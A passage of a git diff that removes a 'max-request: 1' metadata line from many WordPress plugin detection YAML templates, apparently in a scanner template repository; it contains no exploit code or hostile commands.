plugin_namespace: astra-widgets wpscan: https://wpscan.com/plugin/astra-widgets tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 2a79d529cc..1426ac3ef2 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/autoptimize/ metadata: - max-request: 1 plugin_namespace: autoptimize wpscan: https://wpscan.com/plugin/autoptimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 556a113acc..78d1651ff4 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/backwpup/ metadata: - max-request: 1 plugin_namespace: backwpup wpscan: https://wpscan.com/plugin/backwpup tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index 58d9a9d738..f7219b373d 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/better-search-replace/ metadata: - max-request: 1 plugin_namespace: better-search-replace wpscan: https://wpscan.com/plugin/better-search-replace tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 6c9c485079..f688a68f72 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/better-wp-security/ metadata: - max-request: 1 plugin_namespace: better-wp-security wpscan: https://wpscan.com/plugin/better-wp-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 7631e87d78..00e95c4263 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/black-studio-tinymce-widget/ metadata: - max-request: 1 plugin_namespace: black-studio-tinymce-widget wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index c7daa26ac6..212b2b13c4 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/breadcrumb-navxt/ metadata: - max-request: 1 plugin_namespace: breadcrumb-navxt wpscan: https://wpscan.com/plugin/breadcrumb-navxt tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 68767e4dce..6318392c5c 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/breeze/ metadata: - max-request: 1 plugin_namespace: breeze wpscan: https://wpscan.com/plugin/breeze tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 073618936d..e1a2a186e0 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/broken-link-checker/ metadata: - max-request: 1 plugin_namespace: broken-link-checker wpscan: https://wpscan.com/plugin/broken-link-checker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 6aabc19e9f..23614882a7 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/child-theme-configurator/ metadata: - max-request: 1 plugin_namespace: child-theme-configurator wpscan: https://wpscan.com/plugin/child-theme-configurator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index ac80e4f31b..85965337cb 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/classic-editor/ metadata: - max-request: 1 plugin_namespace: classic-editor wpscan: https://wpscan.com/plugin/classic-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 15d7a24755..33d903a1b4 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/classic-widgets/ metadata: - max-request: 1 plugin_namespace: classic-widgets wpscan: https://wpscan.com/plugin/classic-widgets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 40ccc15b27..3c6f8f287b 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/click-to-chat-for-whatsapp/ metadata: - max-request: 1 plugin_namespace: click-to-chat-for-whatsapp wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 1fad3cee08..c3b630cde2 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cmb2/ metadata: - max-request: 1 plugin_namespace: cmb2 wpscan: https://wpscan.com/plugin/cmb2 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index ebe4ee41a7..5c8ce709b6 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/coblocks/ metadata: - max-request: 1 plugin_namespace: coblocks wpscan: https://wpscan.com/plugin/coblocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 5c32110e0e..aea47b9e84 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/code-snippets/ metadata: - max-request: 1 plugin_namespace: code-snippets wpscan: https://wpscan.com/plugin/code-snippets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 09c2e2f360..78c584c388 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/coming-soon/ metadata: - max-request: 1 plugin_namespace: coming-soon wpscan: https://wpscan.com/plugin/coming-soon tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 1a2e8beb3e..2c80d09c27 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/complianz-gdpr/ metadata: - max-request: 1 plugin_namespace: complianz-gdpr wpscan: https://wpscan.com/plugin/complianz-gdpr tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 706145493c..4b1b3a8754 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/contact-form-7-honeypot/ metadata: - max-request: 1 plugin_namespace: contact-form-7-honeypot wpscan: https://wpscan.com/plugin/contact-form-7-honeypot tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index cf6a6ee635..06ad83bdf7 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/contact-form-7/ metadata: - max-request: 1 plugin_namespace: contact-form-7 wpscan: https://wpscan.com/plugin/contact-form-7 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index c039765929..b20666268f 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/contact-form-cfdb7/ metadata: - max-request: 1 plugin_namespace: contact-form-cfdb7 wpscan: https://wpscan.com/plugin/contact-form-cfdb7 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index a2c92dff4b..b2a097bfe7 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cookie-law-info/ metadata: - max-request: 1 plugin_namespace: cookie-law-info wpscan: https://wpscan.com/plugin/cookie-law-info tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index 41b5d6c854..c71fa258af 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cookie-notice/ metadata: - max-request: 1 plugin_namespace: cookie-notice wpscan: https://wpscan.com/plugin/cookie-notice tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index cca31cc3a9..5a98e67597 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/creame-whatsapp-me/ metadata: - max-request: 1 plugin_namespace: creame-whatsapp-me wpscan: https://wpscan.com/plugin/creame-whatsapp-me tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index ff9c0a49ce..4463174203 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/creative-mail-by-constant-contact/ metadata: - max-request: 1 plugin_namespace: creative-mail-by-constant-contact wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index a76d3306bb..cfac0b961b 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/custom-css-js/ metadata: - max-request: 1 plugin_namespace: custom-css-js wpscan: https://wpscan.com/plugin/custom-css-js tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 2249681b6d..846761f2f7 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/custom-fonts/ metadata: - max-request: 1 plugin_namespace: custom-fonts wpscan: https://wpscan.com/plugin/custom-fonts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index b5389b27c9..0def6e61ca 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/custom-post-type-ui/ metadata: - max-request: 1 plugin_namespace: custom-post-type-ui wpscan: https://wpscan.com/plugin/custom-post-type-ui tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 00d183f507..5c5decc127 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/disable-comments/ metadata: - max-request: 1 plugin_namespace: disable-comments wpscan: https://wpscan.com/plugin/disable-comments tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 451e1daef1..a8229a338e 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/disable-gutenberg/ metadata: - max-request: 1 plugin_namespace: disable-gutenberg wpscan: https://wpscan.com/plugin/disable-gutenberg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index af30ca76b6..6559e64dce 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duplicate-page/ metadata: - max-request: 1 plugin_namespace: duplicate-page wpscan: https://wpscan.com/plugin/duplicate-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index 93823466d4..a4368b8aa6 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duplicate-post/ metadata: - max-request: 1 plugin_namespace: duplicate-post wpscan: https://wpscan.com/plugin/duplicate-post tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index e224283ecd..ec119e762a 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duplicator/ metadata: - max-request: 1 plugin_namespace: duplicator wpscan: https://wpscan.com/plugin/duplicator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 9af8df08a7..b7ec7576a3 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duracelltomi-google-tag-manager/ metadata: - max-request: 1 plugin_namespace: duracelltomi-google-tag-manager wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml index d4081474c3..c42d679973 100644 --- a/http/technologies/wordpress/plugins/easy-fancybox.yaml +++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/easy-fancybox/ metadata: - max-request: 1 plugin_namespace: easy-fancybox wpscan: https://wpscan.com/plugin/easy-fancybox tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index bcbc0707fb..fc44375947 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/easy-table-of-contents/ metadata: - max-request: 1 plugin_namespace: easy-table-of-contents wpscan: https://wpscan.com/plugin/easy-table-of-contents tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index 8b23832297..a1616c1741 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/easy-wp-smtp/ metadata: - max-request: 1 plugin_namespace: easy-wp-smtp wpscan: https://wpscan.com/plugin/easy-wp-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index f0c3e4bc63..6cfb8bc272 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/elementor/ metadata: - max-request: 1 plugin_namespace: elementor wpscan: https://wpscan.com/plugin/elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index eab4a0d725..9caaa53263 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/elementskit-lite/ metadata: - max-request: 1 plugin_namespace: elementskit-lite wpscan: https://wpscan.com/plugin/elementskit-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 74c172ac94..5e6b557952 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/enable-media-replace/ metadata: - max-request: 1 plugin_namespace: enable-media-replace wpscan: https://wpscan.com/plugin/enable-media-replace tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index f5a63a2ed2..c5a665e6f7 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/envato-elements/ metadata: - max-request: 1 plugin_namespace: envato-elements wpscan: https://wpscan.com/plugin/envato-elements tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 25ca7328ef..a8b56b5df0 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/essential-addons-for-elementor-lite/ metadata: - max-request: 1 plugin_namespace: essential-addons-for-elementor-lite wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index cb1db5bee6..4e20e57107 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ewww-image-optimizer/ metadata: - max-request: 1 plugin_namespace: ewww-image-optimizer wpscan: https://wpscan.com/plugin/ewww-image-optimizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index a3207ea16a..6f6a416595 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/facebook-for-woocommerce/ metadata: - max-request: 1 plugin_namespace: facebook-for-woocommerce wpscan: https://wpscan.com/plugin/facebook-for-woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2a4b772078..2dd0ef57b5 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/fast-indexing-api/ metadata: - max-request: 1 plugin_namespace: fast-indexing-api wpscan: https://wpscan.com/plugin/fast-indexing-api tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 366205085d..11942f4fa4 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/favicon-by-realfavicongenerator/ metadata: - max-request: 1 plugin_namespace: favicon-by-realfavicongenerator wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 598f08ce88..87c2aeb4bd 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/flamingo/ metadata: - max-request: 1 plugin_namespace: flamingo wpscan: https://wpscan.com/plugin/flamingo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 42cdfb4475..3696eefbf7 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/fluentform/ metadata: - max-request: 1 plugin_namespace: fluentform wpscan: https://wpscan.com/plugin/fluentform tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index a1af263dbd..8bab0a9c3e 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/font-awesome/ metadata: - max-request: 1 plugin_namespace: font-awesome wpscan: https://wpscan.com/plugin/font-awesome tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index 19265f910e..affd270123 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/force-regenerate-thumbnails/ metadata: - max-request: 1 plugin_namespace: force-regenerate-thumbnails wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index c21d414695..1e6a62e23b 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/formidable/ metadata: - max-request: 1 plugin_namespace: formidable wpscan: https://wpscan.com/plugin/formidable tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 91c89d0ad8..980265f531 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/forminator/ metadata: - max-request: 1 plugin_namespace: forminator wpscan: https://wpscan.com/plugin/forminator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index 539d9f7cec..daf205789d 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ga-google-analytics/ metadata: - max-request: 1 plugin_namespace: ga-google-analytics wpscan: https://wpscan.com/plugin/ga-google-analytics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index f4123bb594..22bfa3ffe2 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/gdpr-cookie-compliance/ metadata: - max-request: 1 plugin_namespace: gdpr-cookie-compliance wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 254f916291..7ed171d662 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/ metadata: - max-request: 1 plugin_namespace: google-analytics-dashboard-for-wp wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 8074ac337e..ad238445fc 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-analytics-for-wordpress/ metadata: - max-request: 1 plugin_namespace: google-analytics-for-wordpress wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index b9de0ee313..7161671960 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-listings-and-ads/ metadata: - max-request: 1 plugin_namespace: google-listings-and-ads wpscan: https://wpscan.com/plugin/google-listings-and-ads tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml 